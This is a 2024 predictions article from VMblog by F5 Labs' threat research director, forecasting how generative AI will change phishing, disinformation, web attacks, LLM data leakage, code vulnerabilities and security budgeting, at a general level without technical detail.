Virtualization Technology News and Information
Article
RSS
F5 Labs 2024 Predictions: 10 Cybersecurity and Generative AI Predictions

vmblog-predictions-2024 

Industry executives and experts share their predictions for 2024.  Read them in this 16th annual VMblog.com series exclusive.

10 Cybersecurity and Generative AI Predictions for 2024

By David Warburton, Director of F5 Labs

AI will advance attacker capabilities and introduce new vulnerabilities as enterprise architectures become more complex. On the surface this doesn't sound like much of a forecast, since security people everywhere have been predicting the use of large language models (LLMs) to write phishing emails since ChatGPT was first released to the public. Indeed, the more perspicacious among us realized that that is the just the start, and there will be myriad ways that generative AI will act as a force multiplier for threats. Still, an unspecified threat is an uncontrolled threat, so our prognosticators have identified a handful of specific ways that LLMs can be brought to bear by attackers.

Prediction #1: Generative AI Will Converse with Phishing Victims

In April 2023 Bruce Schneier pointed out that the real bottleneck in phishing isn't the initial click of the malicious link but the cash out, and that often takes a lot more interaction with the victim than we might assume. We're likely to see LLMs taking over the back-and-forth between phisher and victim.

By incorporating publicly available personal information to create incredibly lifelike scams that more expertly adopt targets' vernacular and idioms, organized cybercrime groups will take the phishing-as-a-service we already know and magnify it both in scale and efficiency.

Prediction #2: Organized Crime Will Use Generative AI with Fake Accounts

In a related, though subtly different prediction, organized cybercrime will ramp up creating entirely fake online personas next year. Generative AI will be used to create fake accounts containing posts and images that are indiscernible from real human content. All of the attack strategies that fake accounts engender, including fraud, credential stuffing, disinformation, and marketplace manipulation, will see an enormous boost in productivity when it costs zero effort to match human realism.

Prediction #3: Nation-States Will Use Generative AI for Disinformation

Generative AI tools have the potential to significantly change the way malicious information operations are conducted. The combination of fake content creation, automated text generation for disinformation, targeted misinformation campaigns, and circumvention of content moderation constitutes a leap forward for malicious influence.

Concerns such as these led to Adobe, Microsoft, the BBC, and others creating the C2PA standard, a technique to cryptographically watermark the origin of digital media. Time will tell whether this will have any measurable impact on the general public.

Prediction #4: Advances in Generative AI Will Let Hacktivism Grow

Hacktivist activity related to major world events is expected to grow as computing power continues to become more affordable and, crucially, easier to use. Via AI tools and the power of their smartphones and laptops, it is likely that more unsophisticated actors will join the fight in cyber space as hacktivists.

With world events like the Olympics, elections, and ongoing wars taking place in 2024, hacktivists are likely to use these opportunities to gain notoriety for their group and sympathy for the causes they support. Attendees, sponsors, and other loosely affiliated organizations are likely to become targets, if not victims of these geopolitically motivated hacktivists. This is likely to extend beyond just targeting individuals but also to targeting companies and organizations that support different causes.

Prediction #5: Web Attacks Will Use Real-Time Input from Generative AI

The ability of generative AI to create digital content, be it a phishing email or fake profile, has been well understood for some time. Its use in attacks can therefore be considered passive. However,  with their impressive ability to create code LLMs can, and will, be used to direct the sequences of procedures during live attacks, allowing attackers to react to defenses as they encounter them.

By leveraging APIs from open genAI systems such as ChatGPT, or by building their own LLMs, attackers will be able to incorporate the knowledge and ideas of an AI system during a live attack on a website or network. Should an attacker's website attack find itself blocked due to security controls, an AI system can be used to evaluate the response and suggest alternative ways to attack.

Look for LLMs to diversify attack chains to our detriment soon.

Prediction #6: LLLMs (Leaky Large Language Models)

The enormous potential for opaque automation that complicates the task of security, privacy, and governance/compliance teams to perform their roles.

Fresh research has shown disturbingly simple ways in which LLMs can be tricked into revealing their training data, which often includes proprietary and personal data. We  predict that the rush to create proprietary LLMs will result in many more examples of training data being exposed, if not through novel attacks, then by rushed and misconfigured security controls.

As with cloud breaches, the impact of LLM leaks has the potential to be enormous because of the sheer quantity of data involved.

Prediction #7: Generative Vulnerabilities

Many developers, seasoned and newbie alike, increasingly look to generative AI to write code or check for bugs. But without the correct safeguards in place, many foresee LLMs creating a deluge of vulnerable code which is difficult to secure. Whilst OSS poses a risk, its benefit lies in its inherent fix-once approach-should a vulnerability be discovered in an OSS library, it can be fixed once and then used by everyone who uses that library. With GenAI code generation, every developer will end up with a unique and bespoke piece of code.

In the age of generative AI, organizations that prioritize speed over security will inevitably introduce new vulnerabilities.

Prediction #8: Attacks on the Edge

 The rise of edge computing  will drive a dramatic expansion in attack surface. Physical tampering, management challenges, and software and API vulnerabilities are all risks that are exacerbated in an edge context, which is why we predict that edge compute will emerge as a leading attack surface.

Just as with MFA, attackers will focus on areas where their time has the biggest impact. If the shift to edge computing is handled as carelessly as cloud computing can be, expect to see a similar number of high-profile incidents over the coming year.

Prediction #9: Attackers Will Improve Their Ability to Live Off the Land

There is another risk of growing architectural complexity: more opportunities for attackers to use our tools against us. We foresee that the growing complexity of IT environments, particularly in cloud and hybrid architectures, will make it more challenging to monitor and detect living-off-the-land (LOTL) attacks.

Unless we improve our visibility in our own networks, we can expect to see attackers use our own tools against us with increasing frequency.

Prediction #10: Cybersecurity Poverty Line Will Become Poverty Matrix

Additionally, we're concerned about the effect that trends in security architecture will have on the security poverty line, a concept advanced more than a decade ago by the esteemed Wendy Nather. The security poverty line is defined as the level of knowledge, authority, and most of all budget necessary to accomplish the bare minimum of security controls, and we see the cost and complexity of current security offerings forcing organizations to choose between entire families of controls.

Today it seems that organizations need security orchestration, automation, and incident response (SOAR), security information and event management (SIEM), vulnerability management tools, and threat intelligence services, as well as programs like configuration management, incident response, penetration testing, and governance, compliance, and risk.

In other words, the idea of a simple poverty line no longer captures the tradeoff that exists today between focused capability in one niche and covering all of the bases. Instead of a poverty line we will have a poverty matrix composed of n-dimensions, where n is the number of niches, and even well-resourced enterprises will struggle to put it all together.

Conclusion

As we peer into the future of cybersecurity, these predictions underscore the need for continuous adaptation and innovation in defending against evolving cyber threats. Whether it's addressing the socioeconomic disparities in cybersecurity resilience, fortifying edge computing environments, or preparing for seemingly endless AI-driven assaults on our lives, the cybersecurity landscape of 2024 demands a proactive and collaborative approach to safeguard our digital future.

##

ABOUT THE AUTHOR

David Warbuton 

David Warburton is the director of the threat research team, F5 Labs. He has worked in the IT industry for over 20 years, starting as a full stack developer before wrangling with the perils of cloud architecture and then moving into the serene and peaceful life of cybersecurity. His research covers a wide range of topics from the deeply technical, such as cryptography, to the more real-world sociotechnical side of security. He has appeared on BBC News, Sky News, and other TV and print media. David co-authored the SSL/TLS/HTTPS scanning CI/CD tool ‘Cryptonice' and received a master's degree with distinction in information security from Royal Holloway University of London, where his thesis was on the use of security and cryptography in IoT protocols.

Published Tuesday, January 16, 2024 7:36 AM by David Marshall
Comments
There are no comments for this post.
To post a comment, you must be a registered user. Registration is free and easy! Sign up now!
Calendar
<January 2024>
SuMoTuWeThFrSa
31123456
78910111213
14151617181920
21222324252627
28293031123
45678910